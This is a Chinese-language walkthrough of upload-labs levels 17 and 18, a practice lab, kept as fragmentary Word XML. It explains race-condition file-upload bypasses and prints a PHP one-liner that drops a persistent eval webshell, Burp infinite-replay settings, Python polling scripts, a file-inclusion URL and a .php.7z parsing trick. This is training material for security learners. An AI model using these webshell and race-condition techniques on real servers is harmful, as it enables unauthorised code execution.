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Pass17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打开第十七关，通过提示发现跟以前的都不一样。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7140" cy="2065020"/>
            <wp:effectExtent l="0" t="0" r="762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看来是需要进行代码审计了，那么来看看源码吧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$is_upload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false;$msg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null;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if(isset($_POST['submit'])){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$ext_arr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array('jpg','png','gif');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$file_name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$_FILES['upload_file']['name'];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$temp_file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$file_ext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substr($file_name,strrpos($file_name,".")+1);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$upload_file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UPLOAD_PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'/'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$file_name;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if(move_uploaded_file($temp_file,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$upload_file)){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if(in_array($file_ext,$ext_arr)){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</w:t>
      </w:r>
      <w:r>
        <w:t>$img_path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UPLOAD_PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'/'.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rand(10,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>99).date("YmdHis").".".$file_ext;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</w:t>
      </w:r>
      <w:r>
        <w:t>rename($upload_file,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$img_path);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</w:t>
      </w:r>
      <w:r>
        <w:t>$is_upload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"只允许上传.jpg|.png|.gif类型文件！";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unlink($upload_file);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'上传出错！';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</w:t>
      </w:r>
      <w:r>
        <w:t>}}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从源码来看，服务器先是将上传的文件保存下来，然后将文件的后缀名同白名单对比，如果是jpg、png、gif中的一种，就将文件进行重命名。如果不符合的话，unlink()函数就会删除该文件。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这么看来如果我们还是上传一个图片马的话，网站依旧存在文件包含漏洞我们还是可以进行利用。但是如果没有文件包含漏洞的话，我们就只能上传一个php木马来解析运行了。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那还怎么搞？上传上去就被删除了，我还怎么去访问啊。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不慌不慌，要知道代码执行的过程是需要耗费时间的。如果我们能在上传的一句话被删除之前访问不就成了。这个也叫做条件竞争上传绕过。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我们可以利用burp多线程发包，然后不断在浏览器访问我们的webshell，会有一瞬间的访问成功。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为了更好的演示效果，把一句话木马换一下改为：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&lt;?php fputs(fopen('shell.php','w'),'&lt;?php @eval($_POST["test"])?&gt;');?&gt;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把这个php文件通过burp一直不停的重放，然后再写python脚本去不停的访问我们上传的这个文件，总会有那么一瞬间是还没来得及删除就可以被访问到的，一旦访问到该文件就会在当前目录下生成一个shell.php的一句话。在正常的渗透测试中这也是个好办法。因为单纯的去访问带有phpinfo()的文件并没有什么卵用。一旦删除了还是无法利用。但是这个办法生成的shell.php服务器是不会删除的，我们就可以通过蚁剑去链接了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第一步：上传cs.php，并用burp抓包</w:t>
      </w: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4476115"/>
            <wp:effectExtent l="0" t="0" r="63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第二步：设置无限重放，一直上传该文件</w:t>
      </w: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2405" cy="3326765"/>
            <wp:effectExtent l="0" t="0" r="635" b="1079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可以看到这里的配置Payload type是Null payloads。也就是不设置payload。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下方的Continue indefinitely也就是无限重放的意思。</w:t>
      </w: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3675" cy="5173980"/>
            <wp:effectExtent l="0" t="0" r="14605" b="762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可以看到上传该文件的数据包不停地在进行重放。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第三步：运行python脚本不停地访问cs.php知道成功访问到为止。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url =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"http://www.bj.com/upload-labs/upload/cs.php"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>while True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html = requests.get(url)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html.status_code == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>print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"OK"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>break</w:t>
      </w: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6690" cy="2487930"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1143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当出现OK说明访问到了该文件，那么shell.php应该也创建成功了，用蚁剑连一下试试。</w:t>
      </w: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3675" cy="3564890"/>
            <wp:effectExtent l="0" t="0" r="14605" b="127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200"/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打开第十八关，发现还是需要代码审计。那么再来看看源码吧。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//index.php$is_upload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false;$msg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null;if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(isset($_POST['submit'])){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require_once("./myupload.php");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$imgFileName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>=time();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$u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new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>MyUpload($_FILES['upload_file']['name'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$_FILES['upload_file']['tmp_name'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$_FILES['upload_file']['size'],$imgFileName);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$status_code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$u-&gt;upload(UPLOAD_PATH);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switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>($status_code)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1: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$is_upload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$img_path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$u-&gt;cls_upload_dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$u-&gt;cls_file_rename_to;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2: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'文件已经被上传，但没有重命名。';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-1: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'这个文件不能上传到服务器的临时文件存储目录。';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-2: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'上传失败，上传目录不可写。';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-3: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'上传失败，无法上传该类型文件。';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-4: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'上传失败，上传的文件过大。';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-5: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'上传失败，服务器已经存在相同名称文件。';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case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-6: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'文件无法上传，文件不能复制到目标目录。';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  <w:r>
        <w:rPr>
          <w:rStyle w:val="5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default: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$msg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'未知错误！';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break;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//myupload.phpclass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>MyUpload{..................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var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$cls_arr_ext_accepted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array(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".doc",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".xls",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".txt",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".pdf",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".gif",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".jpg",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".zip",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".rar",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".7z",".ppt",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".html",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".xml",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".tiff",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".jpeg",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>".png"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5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..................</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="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</w:t>
      </w:r>
      <w:r>
        <w:t>/** upload()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**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** Method to upload the file.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** This is the only method to call outside the class.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** @para String name of directory we upload to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** @returns void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 xml:space="preserve">  **/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function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>upload(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$dir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$this-&gt;isUploadedFile();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$this-&gt;setDir(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5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$this-&gt;checkExtension();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$this-&gt;checkSize();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// if flag to check if the file exists is set to 1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$this-&gt;cls_file_exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>==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$this-&gt;checkFileExists();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// if we are here, we are ready to move the file to destination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$this-&gt;move();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// check if we need to rename the file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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$this-&gt;cls_rename_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>==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$ret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$this-&gt;renameFile();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if(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!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>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$ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w: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// if we are here, everything worked as planned :)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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$this-&gt;resultUpload(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"SUCCESS"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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</w:t>
      </w:r>
      <w:r>
        <w:t>}..................</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>};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从源码来看的话，服务器先是将文件后缀跟白名单做了对比，然后检查了文件大小以及文件是否已经存在。文件上传之后又对其进行了重命名。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这么看来的话，php是不能上传了，只能上传图片马了，而且需要在图片马没有被重命名之前访问它。要让图片马能够执行还要配合其他漏洞，比如文件包含，apache解析漏洞等。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这里还是将前一关的代码插入图片作出图片马。然后通过文件包含去访问该图片马。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第一步：生成图片马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757045"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1079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第二步：上传图片马，通过burp抓包无限重放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第三步：修改python脚本，不断通过文件包含访问图片马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946150"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1397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这里如果没有访问到该图片返回的状态码也是200，所有前面的脚本不可以用了，需要修改如下：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requests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url =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"http://www.bj.com/upload-labs/upload/include.php?page=./../shell.png"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>while True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html = requests.get(url)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( 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 xml:space="preserve">'Warning'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 xml:space="preserve">not in  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="000080"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>str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(html.text)):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30"/>
          <w:szCs w:val="30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30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>'ok'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30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>break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这里写出./..shell.png是因为最后重命名的文件就是在根目录下，原本以为刚上传上去的也是在根目录或者upload目录，结果不知道怎么没跑出来，后面如果实现了具体的过程会补充齐全的。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同样的这也属于条件竞争的一种，只不过文件的形式不同而已。其实可以直接上传图片马，因为页面会回显改名后的图片马的位置，直接文件包含也能生成shell.php。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值得注意的是这里也可以将php文件后缀名更改为.php.7z，因为白名单中允许上传.7z的文件，但是apache又不能解析这个格式，所以会把该文件当php的格式解析。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5621"/>
    <w:rsid w:val="043B30D0"/>
    <w:rsid w:val="234D23D9"/>
    <w:rsid w:val="263467AF"/>
    <w:rsid w:val="295C2C2E"/>
    <w:rsid w:val="456A7741"/>
    <w:rsid w:val="45845CA3"/>
    <w:rsid w:val="4FA44F5E"/>
    <w:rsid w:val="51F825CA"/>
    <w:rsid w:val="5275483D"/>
    <w:rsid w:val="5368457F"/>
    <w:rsid w:val="569446AE"/>
    <w:rsid w:val="5866040D"/>
    <w:rsid w:val="59711EF6"/>
    <w:rsid w:val="5A8B74C2"/>
    <w:rsid w:val="78B458E5"/>
    <w:rsid w:val="7C59709A"/>
    <w:rsid w:val="7E2B3AD3"/>
    <w:rsid w:val="7F03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2020-03-18T10:26:49Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-18T14:19:15Z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